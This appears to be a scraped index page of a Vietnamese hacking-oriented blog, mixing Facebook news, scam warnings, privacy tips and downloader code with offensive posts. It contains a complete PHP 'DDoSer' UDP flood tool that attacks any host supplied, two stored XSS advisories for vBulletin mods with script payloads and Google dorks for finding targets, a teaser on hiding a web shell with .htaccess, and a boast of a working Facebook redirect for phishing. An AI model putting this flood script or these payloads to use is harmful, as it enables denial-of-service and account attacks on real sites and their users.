Simple Tutorial about Javascript Injection

Chào các bạn!

Sau bài viết về vấn đề chèn nhạc nền vào trang cá nhân Facebook tại đây, mình sẽ làm Tutorial này để hướng dẫn các bạn có thể tự làm điều đó mà không cần làm theo mấy cái status lừa đảo kia.

Trong Tutorial này, mình sẽ hướng dẫn các bạn cơ bản về Javascript Injection. Đầu tiên các bạn hãy tìm hiểu qua về khái niệm này tại đây:

http://www.wikihow.com/Use-JavaScript-Injections

JavaScript injection is a process by which we can insert and use our own JavaScript code in a page, either by entering the code into the address bar, or by finding an XSS vulnerability in a website. Note that the changes can only be seen by you and are not permanent. This is because JavaScript is a "client-side" language.

OK, mình bắt đầu nhé. Trước hết hãy vào trang cá nhân của bạn đã ;)
READ MORE »

Facebook Video Ads hoax, starring Mark Zuckerberg, continues to spread

A hoax chain letter is being spread across Facebook, between users who believe that the social network is asking their opinion about whether it should implemention video adverts or not.

The hoax, which has been spreading for some time, has had something of a resurgence recently following widespread media reports that Facebook will introduce video adverts into users’ newsfeeds later this year. However, the chain letter contains a number of misconceptions, and sharing it will do nothing to change Facebook’s mind about introducing video ads.

READ MORE »

Thực hư chức năng chèn nhạc nền vào trang cá nhân Facebook?

Chào các bạn!

Dạo gần đây có khá nhiều tài khoản Facebook có đăng 1 status hoặc spam comment vào status của các bạn với nội dung đại loại như sau:

Những status như này thường đánh vào tâm lý tò mò, "ham của lạ" của các bạn (ai mà không muốn trang cá nhân mình đặc biệt hơn của người khác khi có thêm nhạc nền chứ, đúng không :D).

READ MORE »

Ngày 'tàn' của Facebook đang đến gần?

Kết quả hai cuộc khảo sát mới đây tại Mỹ cho thấy mạng xã hội lớn nhất thế giới Facebook đang mất dần sức hút đối với giới trẻ và cả người trưởng thành, một thực trạng mà ngay chính công ty Facebook cũng thừa nhận. Nhưng liệu đây có phải là dấu hiệu về “sự suy tàn” của Facebook.

Một cuộc khảo sát mới đây được tiến hành bởi Adam Ludwin, nhà phát triển người Mỹ đã tạo ứng dụng album ảnh cho mạng xã hội mang tên Albumatic, và được công bố trên trang tin Business Insider.

“Đa số thanh niên tham gia khảo sát cho rằng họ cảm thấy khó chịu khi ứng dụng Albumatic quá phụ thuộc vào Facebook. Và cũng như nhiều thiếu niên khác hiện nay, họ nói với tôi rằng đã chán ngấy Facebook”, ông Ludwin cho hay.

READ MORE »

Hacker Trung Quốc dùng Dropbox, WordPress tấn công Đông Nam Á

Băng đảng tội phạm công nghệ DNSCalc đến từ Trung Quốc đã bổ sung Dropbox và WordPress vào danh sách các công cụ phát tán phần mềm độc. Mục tiêu của chúng là các cá nhân và tổ chức chính phủ liên quan đến ASEAN.

Thực tế các dịch vụ này đã bị chúng lợi dụng trong vòng 12 tháng qua theo Giám đốc tình báo Rich Barger đến từ Cyber Squared. Chiến thuật này không mới song nó vẫn qua mặt hầu hết các hãng bảo mật bởi "mọi người không thực sự quan tâm đến nó".

READ MORE »

Free $500 Costco Gift Voucher scam spreads on Facebook

“Claim your Free $500 Costco Voucher Now. Only a few left” is the message you might have seen posted by one of your Facebook friends, but don’t be too quick to believe it.

Yes, the messages may well have been genuinely posted by your friends, but that’s because they were duped by the “Official Costco promotion” into thinking that if they jumped through various hoops (such as sharing the scam promotion with their online pals) that they themselves would receive a $500 gift voucher.

READ MORE »

Tải nhạc chất lượng cao 320Kbps, Lossless tại Zing Mp3

Tải nhạc chất lượng cao 320Kbps, Lossless tại Zing Mp3

Truy cập tại đây: http://code.poly-edu.in/mp3/

Chỉ việc nhập liên kết bài hát các bạn muốn tải. Sau đó chọn chất lượng các bạn muốn (128kbps, 320kbps, Lossless).

READ MORE »

How to Protect Facebook Account from Hackers

Every day, we hear that someone Facebook account is hacked? Today we gonna see how to protect Facebook account from hackers. There are several things you can do to protect yourself from being hacked. We will go through each step in detail.

Here are some tips to prevent getting hacked:

Use strong passwords
You should not use your phone number,your name, your spouse, parents, siblings or dog, or your birthday as your password. Use a mix of letters, digits and punctuation (but not blank spaces). Use both capital and lowercase letters. The longer your password, the better. The shorter your password, the easier it is to hack, especially if it’s a common word or name. A good starting point is six characters, though 8, 10 or 12 are even better. If you have trouble remembering, do something about that, else consider using an unusual phrase or combo of words that only you or a few people might know, then substitute some of the letters with digits and/or punctuation. Humorous combinations might make it easier to remember, but otherwise write your password down in a SAFE place. Or just keep using the “Forgot password?” option to reset your password.
There are some site that you can use to generate strong password online. One example site is Strong Password Generator.

READ MORE »

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
##########################################################################################

Folow: http://www.exploit-db.com/

vBulletin vBShout Mod - Stored XSS Vulnerability

##########################################################################################
#
# Exploit Title: vBShout vBulletin - Stored XSS Vulnerability
# Google Dork: intext:vBShout
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2
# Version: vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x 
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Custom Commands
# (Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
##########################################################################################

Follow: http://www.exploit-db.com/

[PHP] Simple function to get link and download video on Facebook

 

 

Chia sẻ với các bạn một đoạn PHP đơn giản do mình viết để lấy link download video trên Facebook.

<?php
/**
 * @name Simple function to get link and download video on Facebook
 * @author Juno_okyo & Killer
 * @copyright 2013 by J2TeaM
 */

$url = 'https://www.facebook.com/photo.php?v=464181973622841&set=vb.405529542805619&type=3';

_Download($url);

function _Download($url) {
    $useragent = 'Mozilla/5.0 (Linux; U; Android 2.3.3; de-de; HTC Desire Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $source = curl_exec($ch);
    curl_close($ch);
    
    $download = explode('/video_redirect/?src=', $source);
    $download = explode('&amp', $download[1]);
    $download = rawurldecode($download[0]);
    header('Location: ' . $download);
    exit();
}
?>

Các bạn có thể thêm một đoạn GET để có thể download theo dạng ?url=LINK_VIDEO.

Những add-on Firefox mà tôi sử dụng (khuyên dùng)

Chào các bạn!

Có vài bạn có hỏi những add-on mà mình sử dụng cho Firefox của mình, mình viết bài này chia sẻ luôn cho những bạn chưa biết những add-on này ;).

1 - Adblock Plus

Đây là 1 add-on có số lượng người sử dụng nhiều nhất (theo thống kê tại trang https://addons.mozilla.org/)

Giới thiệu của tác giả:

Adblock Plus cho phép bạn giành lại quyền kiểm soát internet và xem web theo cách bạn muốn. Tiện ích này được hỗ trợ bởi hơn bốn mươi bộ lọc trọn gói với hàng chục ngôn ngữ, sẽ tự động cấu hình cho các mục đích từ gỡ bỏ quảng cáo trực tuyến cho đến việc chặn các tên miền chứa phần mềm độc hại. Adblock Plus cũng cho phép bạn tùy biến bộ lọc với sự hỗ trợ của nhiều tính năng hữu ích khác nhau, bao gồm tùy chọn ngữ cảnh cho hình ảnh, thẻ chặn đối với các đối tượng Flash và Java, và một danh sách các mục có thể chặn được để gỡ bỏ script và stylesheet.

READ MORE »

Facebook URL Redirection Vulnerability 2013

This vulnerability redirects victim by using a Facebook URL to any of the url you want (could be some phishing) ;)

Its absolutely working as i myself tried it just now 3:)

Facebook uses hash to avoid url redirection and hash is per account.

READ MORE »

Critical Facebook vulnerability could have made it easy to hack accounts [VIDEO]

A critical vulnerability was recently found in Facebook that could allow an attacker to hijack, and take control over, accounts on the social network.

No, not the one that required the attacker to just send a single SMS text message. This is a *different* vulnerability that can lead to a complete Facebook account takeover.

This latest security hole was discovered by vulnerability researcher Dan Melamed.
Melamed discovered that a security weakness existed in Facebook’s handling of accounts which have multiple email addresses associated with them.

READ MORE »

How to find the primary email address of any Facebook user. Privacy bug squashed

When you sign-up for a social network you expect it to keep its privacy promises. For instance, if you tell the social network not to reveal your email address to any other members, you expect it to remain private.

But a security researcher has detailed how he found a way to find out *any* Facebook user’s primary email address, regardless of their privacy settings, by exploiting a weakness on the social network.
Security researcher Stephen Sclafani described how he stumbled across the privacy hole while ambling through some old mailing lists.

READ MORE »

Remote code injection

x41 - Intro
x42 - Basics Of Remote Code Execution And How It Develops
x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
x44 - Prevention And Filtration
x45 - Conclusion

READ MORE »

[Tutorial] DOM Based XSS Vulnerability

Asalam Alykum Friends.
Title: DOM Based XSS
Author: Darksnipper.

What is Dom?
DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.
Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

READ MORE »

PHP Server DDoSer [V2.0]

[!] PHP Server DDoSer [!]
Version: 2.0

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<title>PHP DDoSer</title>
<center>
<body background="http://www.popsci.com/files/imagecache/related_info_thumbnail/articles/BlackHoleSimulation.jpg">
<font color="FF3636">
<font size= "6">
<font size="5">
<pre>  

</pre>
<b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font>&nbsp;(Don't Hit yourself)<br><br><font color="red">
</font>
<STYLE>
input{
background-color: white; font-size: 10pt; color: black; font-family: Tahoma; border: 1 solid #66;
}
button{
background-color:# FF0303; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;
}
body {

}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);

    $exec_time = $_GET['time'];

    $time = time();
    //print "Started: ".time('d-m-y h:i:s')."<br>";
    $max_time = $time+$exec_time;

    $host = $_GET['host'];

    for($i=0;$i<65000;$i++){
    $out .= 'X';
    }
    while(1){
    $packets++;
    if(time() > $max_time){
    break;
    }
    $rand = rand(1,65000);
    $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
    if($fp){
    fwrite($fp, $out);
    fclose($fp);
    }
    }
    echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
    echo '<br><br>
  <form action="'.$surl.'" method=GET>
  <input type="hidden" name="act" value="phptools">
  Host: <br><input type=text name=host><br>
  Length (seconds): <br><input type=text name=time><br>
  <input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
    <form action=? method=GET>
    <input type="hidden" name="act" value="phptools">
    Host: <br><input type=text name=host value=><br>
    Length (seconds): <br><input type=text name=time value=><br><br>
    <input type=submit value=Go></form>';
}
?>
<marquee behavior="scroll" direction="right"><font color="limegreen"><center><strong>Edited By 3v!L Of Anonymous Pakistan</strong></font></marquee>
</center>
</body>
</html>

Follow: http://www.madleets.com/

Simple PHP Script Anti Flood DDoS

<?php
//
// Description : Script anti flood
// Version      : 0.0.1
// Auteur       : Atmoner
// Url          : http://httpscript.org
//
if (!isset($_SESSION)) {
    session_start();
}
// anti flood protection
if($_SESSION['last_session_request'] > time() - 2){
    // users will be redirected to this page if it makes requests faster than 2 seconds
    header("location: http://junookyo.blogspot.com/");
    exit;
}
$_SESSION['last_session_request'] = time();
?>

Follow: http://www.madleets.com/

Toàn Shinoda, Huy Me, JVevermind - GIF Collection (part 2)

Toàn Shinoda:

READ MORE »

How to protect your Facebook privacy, as new search system is rolled out

It’s time to review how well you well you have been protecting your privacy on Facebook.
Why? Because Facebook is beginning to roll out the new version of its search engine.

First announced by Mark Zuckerberg in January, Graph Search makes it easier for people to find content that has been shared on the social network through the use of natural language and filters.

The upshot is that if you have ever shared something on Facebook, it’s easily searchable by anyone you have given permission to view it. (Or – in some cases – anyone you have forgotten to remove permission from viewing it).

READ MORE »

Share code get link nhạc từ SoundCloud

Hình demo:

Link demo: http://code.poly-edu.in/

Rất đơn giản, chỉ việc nhập link soundcloud mà bạn cần download và nhấn Bắt đầu tải.

Code hỗ trợ ajax và sử dụng player để phát trực tuyến.
READ MORE »

How to hide your shell using .htaccess

Today I want to show you a less known trick in which you can use .htaccess file. Already available on server as a shell to execute OS commands, so just follow the simple steps described below. This file is also useful to add restrictions on files.

Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.
READ MORE »

JVevermind GIF Collection by Juno_okyo

JVevermind GIF Collection by Juno_okyo:

 

READ MORE »

[Tutorial] DOM Base XSS Attack

Chào các bạn!

Lâu rồi không quay Tutorial nào nên hôm nay rảnh rỗi mình quay 1 tutorial về DOM Base XSS. Trước khi xem Tutorial này, hãy tìm hiểu khái niệm về DOM. Theo Wiki:

DOM là chữ viết tắt từ tiếng Anh Document Object Model ("Mô hình Đối tượng Tài liệu"), là một giao diện lập trình ứng dụng (API). Thường thường DOM, có dạng một cây cấu trúc dữ liệu, được dùng để truy xuất các tài liệu dạng HTML và XML. Mô hình DOM độc lập với hệ điều hành và dựa theo kỹ thuật lập trình hướng đối tượng để mô tả tài liệu. 

Ban đầu, chưa có chuẩn thống nhất nên các thành phần trong một tài liệu HTML mô tả bằng các phiên bản khác nhau của DOM được hiển thị bởi các chương trình duyệt web thông qua JavaScript. Điều này buộc World Wide Web Consortium (W3C) phải đưa ra một loạt các mô tả kĩ thuật về tiêu chuẩn cho DOM để thống nhất mô hình này. 

Mặc dù một tài liệu hay văn bản có cấu trúc chặt chẽ (well-structured document) luôn luôn có thể được mô hình hóa bằng một cấu trúc dạng cây, DOM không có giới hạn về cấu trúc dữ liệu của một tài liệu.

Xem thêm tại: http://vi.wikipedia.org/wiki/DOM

READ MORE »